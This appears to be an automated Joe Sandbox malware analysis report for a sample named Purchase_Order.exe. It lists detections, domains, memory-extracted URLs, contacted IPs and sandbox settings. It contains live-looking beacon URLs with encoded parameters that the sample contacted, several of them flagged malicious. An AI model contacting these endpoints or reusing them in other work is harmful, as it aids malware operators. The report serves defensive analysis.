            4.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            mexicobeachselfstorage.com0%VirustotalBrowse
            td-balancer-euw2-6-109.wixdns.net0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.mi0%URL Reputationsafe
            http://schemas.mi0%URL Reputationsafe
            http://schemas.mi0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.carterandcone.comen0%URL Reputationsafe
            http://www.carterandcone.comen0%URL Reputationsafe
            http://www.carterandcone.comen0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.tylerrucarean.com/uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.flockuplabs.com/uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.paolograssino.com/uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.prltoday.com/uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.carterandcone.commd0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.mexicobeachselfstorage.com/uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.trainup-wall.com/uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/N0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/jp/Q0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.cgjanvier.com/uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.culturalinterface.net/uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.carterandcone.coma0%URL Reputationsafe
            http://www.carterandcone.coma0%URL Reputationsafe
            http://www.carterandcone.coma0%URL Reputationsafe
            http://www.a-prime-india-demataccount.zone/uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/X0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/X0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/X0%URL Reputationsafe
            http://www.gorditasdemaiz.com/uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.toolbnbapp.com/uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT0%Avira URL Cloudsafe
            http://www.agfamonotype.0%URL Reputationsafe
            http://www.agfamonotype.0%URL Reputationsafe
            http://www.agfamonotype.0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/Q0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/Q0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/Q0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/N0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/N0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/N0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/oi0%Avira URL Cloudsafe
            http://schemas.micr0%URL Reputationsafe
            http://schemas.micr0%URL Reputationsafe
            http://schemas.micr0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://en.w0%URL Reputationsafe
            http://en.w0%URL Reputationsafe
            http://en.w0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/=0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/=0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/=0%URL Reputationsafe
            www.culturalinterface.net/uqf5/0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mexicobeachselfstorage.com
            		162.241.253.69
            		truetrueunknown
            td-balancer-euw2-6-109.wixdns.net
            		35.246.6.109
            		truetrueunknown
            www.trainup-wall.com
            		45.140.167.161
            		truetrue
              		unknown
              www.a-prime-india-demataccount.zone
              		172.67.155.26
              		truetrue
                		unknown
                www.gorditasdemaiz.com
                		151.101.0.119
                		truetrue
                  		unknown
                  www.cgjanvier.com
                  		156.241.53.127
                  		truetrue
                    		unknown
                    paolograssino.com
                    		160.16.235.37
                    		truetrue
                      		unknown
                      www.stays.travel
                      		91.195.240.94
                      		truefalse
                        		unknown
                        toolbnbapp.com
                        		34.102.136.180
                        		truefalse
                          		unknown
                          www.prltoday.com
                          		213.186.33.5
                          		truetrue
                            		unknown
                            www.culturalinterface.net
                            		104.21.64.212
                            		truetrue
                              		unknown
                              tylerrucarean.com
                              		34.102.136.180
                              		truefalse
                                		unknown
                                flockuplabs.com
                                		184.168.131.241
                                		truetrue
                                  		unknown
                                  www.flockuplabs.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.paolograssino.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.toolbnbapp.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.homeanddesignstudio.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.mexicobeachselfstorage.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.tylerrucarean.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.tylerrucarean.com/uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DTfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.flockuplabs.com/uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DTtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.paolograssino.com/uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DTtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.prltoday.com/uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DTtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mexicobeachselfstorage.com/uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DTtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.trainup-wall.com/uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DTtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.cgjanvier.com/uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DTtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.culturalinterface.net/uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DTtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.a-prime-india-demataccount.zone/uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DTtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.gorditasdemaiz.com/uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DTtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.toolbnbapp.com/uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DTfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              www.culturalinterface.net/uqf5/true
                                              • Avira URL Cloud: safe
                                              		low

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.fontbureau.com/designersGPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                		high
                                                http://schemas.miexplorer.exe, 00000007.00000000.291833894.000000000EBF8000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/?Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/bThePurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers?Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.carterandcone.comenPurchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.tiro.comexplorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designersexplorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.goodfont.co.krPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.comPurchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssPurchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.sajatypeworks.comPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.typography.netDPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.carterandcone.commdPurchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.founder.com.cn/cn/cThePurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.galapagosdesign.com/staff/dennis.htmPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://fontfabrik.comPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.galapagosdesign.com/DPleasePurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.jiyu-kobo.co.jp/jp/NPurchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.jiyu-kobo.co.jp/jp/QPurchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fonts.comPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.sandoll.co.krPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.urwpp.deDPleasePurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.zhongyicts.com.cnPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePurchase_Order.exe, 00000000.00000002.259634056.0000000002AD1000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.sakkal.comPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000007.00000000.282669456.0000000006840000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.carterandcone.comaPurchase_Order.exe, 00000000.00000003.242455042.00000000061CD000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.comPurchase_Order.exe, 00000000.00000002.269184385.00000000061CE000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.galapagosdesign.com/Purchase_Order.exe, 00000000.00000003.248726624.00000000061EE000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/XPurchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.agfamonotype.Purchase_Order.exe, 00000000.00000003.245364083.00000000061EE000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/QPurchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/NPurchase_Order.exe, 00000000.00000003.243172768.00000000061CA000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/oiPurchase_Order.exe, 00000000.00000003.243047372.00000000061C3000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://schemas.micrexplorer.exe, 00000007.00000000.291833894.000000000EBF8000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/jp/Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://en.wPurchase_Order.exe, 00000000.00000003.241548215.00000000061F2000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/=Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.carterandcone.comlPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers/cabarga.htmlNPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cnPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers/frere-jones.htmlPurchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.jiyu-kobo.co.jp/uPurchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.sakkal.com-uPurchase_Order.exe, 00000000.00000003.243758051.00000000061F1000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.monotype.Purchase_Order.exe, 00000000.00000003.250232182.00000000061ED000.00000004.00000001.sdmp, Purchase_Order.exe, 00000000.00000003.245076408.00000000061EE000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.jiyu-kobo.co.jp/Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp, Purchase_Order.exe, 00000000.00000003.243172768.00000000061CA000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designers8Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.jiyu-kobo.co.jp/bPurchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers/Purchase_Order.exe, 00000000.00000003.245036335.00000000061EE000.00000004.00000001.sdmpfalse
                                                                          		high

                                                                          Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          156.241.53.127
                                                                          		www.cgjanvier.comSeychelles
                                                                          		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                          213.186.33.5
                                                                          		www.prltoday.comFrance
                                                                          		16276OVHFRtrue
                                                                          160.16.235.37
                                                                          		paolograssino.comJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                                          172.67.155.26
                                                                          		www.a-prime-india-demataccount.zoneUnited States
                                                                          		13335CLOUDFLARENETUStrue
                                                                          34.102.136.180
                                                                          		toolbnbapp.comUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          45.140.167.161
                                                                          		www.trainup-wall.comUnited Kingdom
                                                                          		29182THEFIRST-ASRUtrue
                                                                          184.168.131.241
                                                                          		flockuplabs.comUnited States
                                                                          		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                          162.241.253.69
                                                                          		mexicobeachselfstorage.comUnited States
                                                                          		46606UNIFIEDLAYER-AS-1UStrue
                                                                          151.101.0.119
                                                                          		www.gorditasdemaiz.comUnited States
                                                                          		54113FASTLYUStrue
                                                                          104.21.64.212
                                                                          		www.culturalinterface.netUnited States
                                                                          		13335CLOUDFLARENETUStrue

                                                                          General Information

                                                                          Joe Sandbox Version:32.0.0 Black Diamond
                                                                          Analysis ID:433266
                                                                          Start date:11.06.2021
                                                                          Start time:15:00:21
                                                                          Joe Sandbox Product:CloudBasic
                                                                          Overall analysis duration:0h 10m 59s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:light
                                                                          Sample file name:Purchase_Order.exe
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                          Number of analysed new started processes analysed:29
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:1
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • HDC enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.evad.winEXE@7/1@13/10
                                                                          EGA Information:Failed
                                                                          HDC Information:
                                                                          • Successful, ratio: 62.1% (good quality ratio 56.8%)
                                                                          • Quality average: 73.2%
                                                                          • Quality standard deviation: 30.7%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          Cookbook Comments:
                                                                          • Adjust boot time
                                                                          • Enable AMSI
                                                                          • Found application associated with file extension: .exe
                                                                          Warnings:
                                                                          Show All
                                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                          • TCP Packets have been reduced to 100
                                                                          • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.255.188.83, 104.42.151.234, 92.122.145.220, 184.30.20.56, 20.82.209.183, 2.20.142.209, 2.20.142.210, 20.190.160.8, 20.190.160.67, 20.190.160.6, 20.190.160.2, 20.190.160.129, 20.190.160.136, 20.190.160.132, 20.190.160.71, 92.122.213.247, 92.122.213.194, 20.54.7.98, 20.54.26.129
